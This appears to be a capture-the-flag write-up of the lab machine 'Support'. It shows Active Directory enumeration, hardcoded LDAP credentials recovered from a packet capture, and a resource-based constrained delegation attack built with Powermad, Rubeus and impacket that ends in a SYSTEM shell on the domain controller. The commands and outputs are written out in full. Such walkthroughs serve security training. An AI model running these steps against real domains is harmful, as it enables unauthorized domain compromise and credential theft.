Support
Completed on September 7, 2022
Overview
Support, in my opinion, tries to show people things that are sometimes done by support team who might not think of the consequences. From exposing tools used to developing tools that use cleartext credentials, you will have the opportunity to explore these as well as other misconfigurations in the environment.
References
Enumeration
Service Enumeration
Just like every scenario, we need to get to know our target better. We do this enumeration by trying to find ports opened on the host and then enumerate each service.
Finding Open Ports:
As you might know, we are looking at an active directory environment.
Through LDAP, we got found the domain, but we can explore further.
LDAP (TCP 389) Enumeration:
As we must, let's find out what we can get through LDAP.
Well, basically LDAP is not accessible without valid credentials. Let's proceed to the next service.
Kerberos (TCP 88) Enumeration:
Through Kerberos, we can only attempt to bruteforce user accounts at this point in the exercise to find valid ones.
From the accounts found and excluding the default ones, we can see support@support.htb and management@support.htb exist. Whoever has worked in an enterprise environment can assume easily these might be shared accounts, which technically should be avoided.
SMB (TCP 445) Enumeration:
As basic step when enumerating SMB is to attempt to use null sessions and find out what is allowed.
The only share that we can attempt to access is support-tools.
From these tools, the only unrecognized one is UserInfo.exe.zip. We need to unzip the file and test it.
Gaining Access
While looking at the unzipped files, we need to try and run it the Windows executable somehow. For this, we will use mono.
Let's try to use it to retrieve user information from the accounts we got through Kerberos. As it is retrieving user information, this means it must be connecting to a service, so let's attempt to capture some packets:
And the packet capture reveals another account and its password:
Found potentially hardcoded credentials: ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Our first test of this credential would be to use it through Bloodhound and in turn enumerate the domain further:
Looking at the relationship between 'support' and the domain controller shows this account inherits the ‘GenericAll’ delegated right through its membership of the 'Shared Support Account'.
Also, we can now pull a list of users from the domain:
Through LDAP, we will enumerate the 'support' account and its attributes:
┌──(kali 👿 kali)-[~/…/Support]
└─$ ldapsearch -x -H ldap://support.htb:389 -D 'SUPPORT\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=support,CN=Users,DC=support,DC=htb' -s base
# extended LDIF
#
# LDAPv3
# base <CN=support,CN=Users,DC=support,DC=htb> with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 1
codePage: 0
countryCode: 0
badPasswordTime: 133069989459107223
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
The info attribute contains account information related to credentials: support:Ironside47pleasure40Watchful
Given that the ‘support’ account has 'canPSRemote' right or delegated rights, we can attempt to access the system using this account through WinRM:
User flag found:
Privilege Escalation
Constrained Delegation
The inherited rights of 'support' by its membership of 'Shared Support Accounts' group mean the following:
GenericAll: GenericAll = Full Control
The right to create or delete children, delete a subtree, read and write properties, examine children and the object itself, add and remove the object from the directory, and read or write with an extended right.
It provides full rights to the object and all properties, including confidential attributes such as LAPS local Administrator passwords, and BitLocker recovery keys. In many cases, Full Control rights aren’t required, but it’s easier to delegate and get working than determining the actual rights required.
Example: A Server tier group may be delegated Full Control on all Computer objects in an OU that has the computer objects associated with servers. Another common configuration is delegating Full Control on all Computer objects in the Workstations OU for the Desktop Support group, and delegating Full Control on all user objects in the Users OU for the Help Desk.
• Set Execution Policy and Import PowerView
• Checking if user can create new computer objects: ms-ds-machineaccountquota
Run the following (change the values of the parameters of course): Get-DomainObject -Identity "dc=offense,dc=local" -Domain offense.local
*Evil-WinRM* PS C:\Users\support\Downloads> Get-DomainObject -Identity "DC=support,DC=htb" -Domain support.htb
msds-isdomainfor : CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
lockoutobservationwindow : -18000000000
iscriticalsystemobject : True
maxpwdage : -9223372036854775808
msds-alluserstrustquota : 1000
distinguishedname : DC=support,DC=htb
objectclass : {top, domain, domainDNS}
pwdproperties : 1
gplink : [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=support,DC=htb;0]
name : support
wellknownobjects : {B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=support,DC=htb, B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=support,DC=htb,
B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=support,DC=htb, B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=support,DC=htb...}
serverstate : 1
nextrid : 1000
objectsid : S-1-5-21-1677581083-3380853377-188903654
msds-behavior-version : 7
fsmoroleowner : CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
repluptodatevector : {2, 0, 0, 0...}
uascompat : 0
dsasignature : {1, 0, 0, 0...}
ridmanagerreference : CN=RID Manager$,CN=System,DC=support,DC=htb
ntmixeddomain : 0
whenchanged : 9/6/2022 9:08:48 PM
msds-perusertrusttombstonesquota : 10
instancetype : 5
lockoutthreshold : 0
objectguid : 553cd9a3-86c4-4d64-9e85-5146a98c868e
auditingpolicy : {0, 1}
msds-perusertrustquota : 1
systemflags : -1946157056
objectcategory : CN=Domain-DNS,CN=Schema,CN=Configuration,DC=support,DC=htb
dscorepropagationdata : 1/1/1601 12:00:00 AM
otherwellknownobjects : {B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=support,DC=htb, B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Service Accounts,DC=support,DC=htb}
creationtime : 133069721280550451
whencreated : 5/28/2022 11:01:46 AM
minpwdlength : 7
msds-nctype : 0
pwdhistorylength : 24
dc : support
msds-masteredby : CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
usncreated : 4099
subrefs : {DC=ForestDnsZones,DC=support,DC=htb, DC=DomainDnsZones,DC=support,DC=htb, CN=Configuration,DC=support,DC=htb}
msds-expirepasswordsonsmartcardonlyaccounts : True
masteredby : CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
lockoutduration : -18000000000
usnchanged : 86045
modifiedcountatlastprom : 0
modifiedcount : 1
forcelogoff : -9223372036854775808
ms-ds-machineaccountquota : 10
minpwdage : -864000000000
As a validation step, we check the domain controllers OS as the domain must be at least at the 'Windows Server 2012' level:
*Evil-WinRM* PS C:\Users\support\Downloads> Get-DomainController
Forest : support.htb
CurrentTime : 9/7/2022 2:52:25 PM
HighestCommittedUsn : 1355255
OSVersion : Windows Server 2022 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : support.htb
IPAddress : ::1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : dc.support.htb
Partitions : {DC=support,DC=htb, CN=Configuration,DC=support,DC=htb, CN=Schema,CN=Configuration,DC=support,DC=htb, DC=DomainDnsZones,DC=support,DC=htb...}
• Check target computer(s) object(s) must not have the attribute msds-allowedtoactonbehalfofotheridentity:
*Evil-WinRM* PS C:\Users\support\Downloads> Get-NetComputer | Select-Object -Property name,msds-allowedtoactonbehalfofotheridentity
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC
MANAGEMENT
• Create a new domain object: For this, we will use PowerMad!
*Evil-WinRM* PS C:\Users\support\Downloads> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Downloads> $passwd=ConvertTo-SecureString 'test123' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\support\Downloads> New-MachineAccount -MachineAccount FAKE01 -Password $passwd
[+] Machine account FAKE01 added
*Evil-WinRM* PS C:\Users\support\Downloads> Get-DomainComputer FAKE01
pwdlastset : 9/7/2022 9:41:47 AM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=FAKE01,CN=Computers,DC=support,DC=htb
objectclass : {top, person, organizationalPerson, user...}
name : FAKE01
objectsid : S-1-5-21-1677581083-3380853377-188903654-5601
samaccountname : FAKE01$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
countrycode : 0
whenchanged : 9/7/2022 4:41:47 PM
instancetype : 4
usncreated : 1355271
objectguid : eaa3207a-d66f-40e9-ad04-59df1c57d84c
lastlogon : 12/31/1600 4:00:00 PM
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=support,DC=htb
dscorepropagationdata : 1/1/1601 12:00:00 AM
serviceprincipalname : {RestrictedKrbHost/FAKE01, HOST/FAKE01, RestrictedKrbHost/FAKE01.support.htb, HOST/FAKE01.support.htb}
ms-ds-creatorsid : {1, 5, 0, 0...}
badpwdcount : 0
cn : FAKE01
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 9/7/2022 4:41:47 PM
primarygroupid : 515
iscriticalsystemobject : False
usnchanged : 1355273
dnshostname : FAKE01.support.htb
*Evil-WinRM* PS C:\Users\support\Downloads> Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "FAKE01$"
*Evil-WinRM* PS C:\Users\support\Downloads> Get-ADComputer "DC" -Properties PrincipalsAllowedToDelegateToAccount
DistinguishedName : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName : dc.support.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE01,CN=Computers,DC=support,DC=htb}
SamAccountName : DC$
SID : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName :
Then, we need to get the target machine SPNs:
*Evil-WinRM* PS C:\Users\support\Downloads> Get-DomainComputer DC | Select-Object -ExpandProperty serviceprincipalname
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dc.support.htb
ldap/dc.support.htb/ForestDnsZones.support.htb
ldap/dc.support.htb/DomainDnsZones.support.htb
DNS/dc.support.htb
GC/dc.support.htb/support.htb
RestrictedKrbHost/dc.support.htb
RestrictedKrbHost/DC
RPC/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb
HOST/DC/SUPPORT
HOST/dc.support.htb/SUPPORT
HOST/DC
HOST/dc.support.htb
HOST/dc.support.htb/support.htb
E3514235-4B06-11D1-AB04-00C04FC2DCD2/290156e5-22cb-4f1b-9b96-5516d84c363c/support.htb
ldap/DC/SUPPORT
ldap/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb
ldap/dc.support.htb/SUPPORT
ldap/DC
ldap/dc.support.htb
ldap/dc.support.htb/support.htbAt this point, we need to get the machine account hash from FAKE01$ and then try to get the Administrator account's TGT, so then we can use it to access the system as the Administrator user:
Using Rubeus to get the machine account hash:
*Evil-WinRM* PS C:\Users\support\Downloads> .\Rubeus.exe hash /password:test123 /user:FAKE01$ /domain:support.htb
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Calculate Password Hash(es)
[*] Input password : test123
[*] Input username : FAKE01$
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTBhostfake01.support.htb
[*] rc4_hmac : C5A237B7E9D8E708D8436B6148A25FA1
[*] aes128_cts_hmac_sha1 : 7C98F2E0201C3196398561D61583227E
[*] aes256_cts_hmac_sha1 : 269A967C37B89B0EC1955755AC29E8EEE86A8E7B8755C85B2542A9FF5D1B9273
[*] des_cbc_md5 : 94EC131A430B57CERetrieving the Administrator's TGT:
┌──(kali 👿 kali)-[~/…/Support]
└─$ impacket-getST 'support.htb/FAKE01' -dc-ip dc.support.htb -spn ldap/dc.support.htb -impersonate administrator \
-aesKey 269A967C37B89B0EC1955755AC29E8EEE86A8E7B8755C85B2542A9FF5D1B9273
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccacheAccessing the domain controller as the Administrator user:
┌──(kali 👿 kali)-[~/…/Support]
└─$ KRB5CCNAME=./administrator.ccache \
impacket-smbexec 'support.htb/Administrator@dc.support.htb' -no-pass -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.227.255
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>dir c:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 955A-5CBB
Directory of c:\Users\Administrator\Desktop
05/28/2022 04:17 AM <DIR> .
05/28/2022 04:11 AM <DIR> ..
09/06/2022 02:09 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,133,308,928 bytes free
C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
6c9ae4********************3965ecAND we got root!!
Last updated
Was this helpful?